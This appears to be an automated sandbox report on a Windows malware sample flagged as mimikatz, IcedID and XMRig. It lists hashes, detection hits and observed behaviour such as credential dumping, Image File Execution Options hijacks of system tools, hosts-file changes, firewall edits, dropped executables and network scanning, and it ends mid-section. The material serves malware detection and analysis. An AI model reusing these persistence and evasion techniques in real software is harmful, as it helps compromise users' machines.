Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-11-2024 08:59
Behavioral task
behavioral1
Sample
2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe
-
Size
14.1MB
-
MD5
479c9157652098b6ad8b0ae879c1df5a
-
SHA1
6e71d05343603a52bc45ddc3580da1dc54533b46
-
SHA256
952fadb3ee26348ccf3d760f3cc95f55802cd089d32f4f65baf61b98d628ae30
-
SHA512
5752824e5d6c4a4cb454cb6e6b18c5469f73b91c791c36be147e5862b9135aac103097e2ddebf19edbaed61ca290939553fd86b01dec834f0c7ea310da4cb62b
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
tsgwibn.exedescription pid process target process PID 3396 created 2152 3396 tsgwibn.exe spoolsv.exe -
Xmrig family
-
Contacts a large (28555) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/4136-178-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig behavioral2/memory/4136-182-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig behavioral2/memory/4136-199-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig behavioral2/memory/4136-212-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig behavioral2/memory/4136-221-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig behavioral2/memory/4136-236-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig behavioral2/memory/4136-251-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig behavioral2/memory/4136-259-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig behavioral2/memory/4136-268-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig behavioral2/memory/4136-377-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig behavioral2/memory/4136-378-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig behavioral2/memory/4136-382-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/2596-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/2596-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz C:\Windows\guiyywyg\tsgwibn.exe mimikatz behavioral2/memory/4084-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/4704-138-0x00007FF6A8220000-0x00007FF6A830E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
tsgwibn.exewpcap.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts tsgwibn.exe File opened for modification C:\Windows\system32\drivers\etc\hosts tsgwibn.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
tsgwibn.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe tsgwibn.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 4848 netsh.exe 3664 netsh.exe -
Executes dropped EXE 30 IoCs
Processes:
tsgwibn.exetsgwibn.exewpcap.exeuzurgcimy.exevfshost.exexohudmc.execumgbbwyg.exeascsoo.exewerigg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.exetsgwibn.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.exewvwuinghb.exetsgwibn.exepid process 4084 tsgwibn.exe 3396 tsgwibn.exe 1452 wpcap.exe 4136 uzurgcimy.exe 4704 vfshost.exe 1568 xohudmc.exe 3448 cumgbbwyg.exe 2540 ascsoo.exe 4136 werigg.exe 2576 cumgbbwyg.exe 3280 cumgbbwyg.exe 4848 cumgbbwyg.exe 3328 cumgbbwyg.exe 1848 cumgbbwyg.exe 4056 cumgbbwyg.exe 1264 cumgbbwyg.exe 4496 cumgbbwyg.exe 3836 cumgbbwyg.exe 3812 cumgbbwyg.exe 3992 cumgbbwyg.exe 3620 cumgbbwyg.exe 2628 cumgbbwyg.exe 4432 tsgwibn.exe 3028 cumgbbwyg.exe 4448 cumgbbwyg.exe 4696 cumgbbwyg.exe 2204 cumgbbwyg.exe 1720 cumgbbwyg.exe 3888 wvwuinghb.exe 6804 tsgwibn.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exeuzurgcimy.exepid process 1452 wpcap.exe 1452 wpcap.exe 1452 wpcap.exe 1452 wpcap.exe 1452 wpcap.exe 1452 wpcap.exe 1452 wpcap.exe 1452 wpcap.exe 1452 wpcap.exe 4136 uzurgcimy.exe 4136 uzurgcimy.exe 4136 uzurgcimy.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 81 ifconfig.me 82 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
tsgwibn.exexohudmc.exewpcap.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 tsgwibn.exe File created C:\Windows\SysWOW64\ascsoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF tsgwibn.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\ascsoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE tsgwibn.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 tsgwibn.exe -
Processes:
resource yara_rule C:\Windows\vguwtuflb\Corporate\vfshost.exe upx behavioral2/memory/4704-135-0x00007FF6A8220000-0x00007FF6A830E000-memory.dmp upx behavioral2/memory/4704-138-0x00007FF6A8220000-0x00007FF6A830E000-memory.dmp upx C:\Windows\Temp\vguwtuflb\cumgbbwyg.exe upx behavioral2/memory/3448-149-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/3448-160-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx C:\Windows\Temp\sbymbrggy\werigg.exe upx behavioral2/memory/4136-165-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/2576-171-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/3280-175-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/4136-178-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/4848-180-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/4136-182-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/3328-185-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/1848-189-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/4056-193-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/1264-197-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/4136-199-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/4496-202-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/3836-206-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/3812-210-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/4136-212-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/3992-215-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/3620-219-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/4136-221-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/2628-224-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/3028-231-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/4448-233-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/4696-235-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/4136-236-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/2204-238-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/1720-240-0x00007FF712F40000-0x00007FF712F9B000-memory.dmp upx behavioral2/memory/4136-251-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/4136-259-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/4136-268-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/4136-377-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/4136-378-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx behavioral2/memory/4136-382-0x00007FF6AA150000-0x00007FF6AA270000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
tsgwibn.exe2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exewvwuinghb.execmd.exedescription ioc process File created C:\Windows\vguwtuflb\UnattendGC\specials\libeay32.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\xdvl-0.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\coli-0.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\crli-0.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\docmicfg.xml tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\wvwuinghb.exe tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\svschost.xml tsgwibn.exe File created C:\Windows\guiyywyg\vimpcsvc.xml tsgwibn.exe File created C:\Windows\guiyywyg\docmicfg.xml tsgwibn.exe File opened for modification C:\Windows\guiyywyg\spoolsrv.xml tsgwibn.exe File created C:\Windows\vguwtuflb\Corporate\mimilib.dll tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\Packet.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\vimpcsvc.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\schoedcl.xml tsgwibn.exe File created C:\Windows\vguwtuflb\upbdrjv\swrpwe.exe tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\wpcap.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\trch-1.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\ucl.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\docmicfg.exe tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\svschost.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\spoolsrv.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\spoolsrv.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\docmicfg.xml tsgwibn.exe File opened for modification C:\Windows\guiyywyg\tsgwibn.exe 2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\libxml2.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\ssleay32.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\zlib1.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\svschost.exe tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\schoedcl.exe tsgwibn.exe File created C:\Windows\guiyywyg\spoolsrv.xml tsgwibn.exe File opened for modification C:\Windows\guiyywyg\svschost.xml tsgwibn.exe File opened for modification C:\Windows\guiyywyg\schoedcl.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\Shellcode.ini tsgwibn.exe File created C:\Windows\guiyywyg\tsgwibn.exe 2024-11-06_479c9157652098b6ad8b0ae879c1df5a_hacktools_icedid_mimikatz.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\tucl-1.dll tsgwibn.exe File opened for modification C:\Windows\guiyywyg\docmicfg.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\spoolsrv.exe tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\AppCapture32.dll tsgwibn.exe File created C:\Windows\vguwtuflb\Corporate\vfshost.exe tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\exma-1.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\posh-0.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\tibe-2.dll tsgwibn.exe File created C:\Windows\guiyywyg\schoedcl.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\vimpcsvc.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\schoedcl.xml tsgwibn.exe File created C:\Windows\guiyywyg\svschost.xml tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\ip.txt tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\trfo-2.dll tsgwibn.exe File created C:\Windows\ime\tsgwibn.exe tsgwibn.exe File opened for modification C:\Windows\vguwtuflb\imnwwtqyn\Result.txt wvwuinghb.exe File created C:\Windows\vguwtuflb\UnattendGC\AppCapture64.dll tsgwibn.exe File created C:\Windows\vguwtuflb\Corporate\mimidrv.sys tsgwibn.exe File opened for modification C:\Windows\vguwtuflb\Corporate\log.txt cmd.exe File created C:\Windows\vguwtuflb\imnwwtqyn\scan.bat tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\wpcap.exe tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\cnli-1.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\vimpcsvc.exe tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\uzurgcimy.exe tsgwibn.exe File opened for modification C:\Windows\vguwtuflb\imnwwtqyn\Packet.dll tsgwibn.exe File opened for modification C:\Windows\guiyywyg\vimpcsvc.xml tsgwibn.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 2728 sc.exe 4084 sc.exe 3196 sc.exe 1124 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
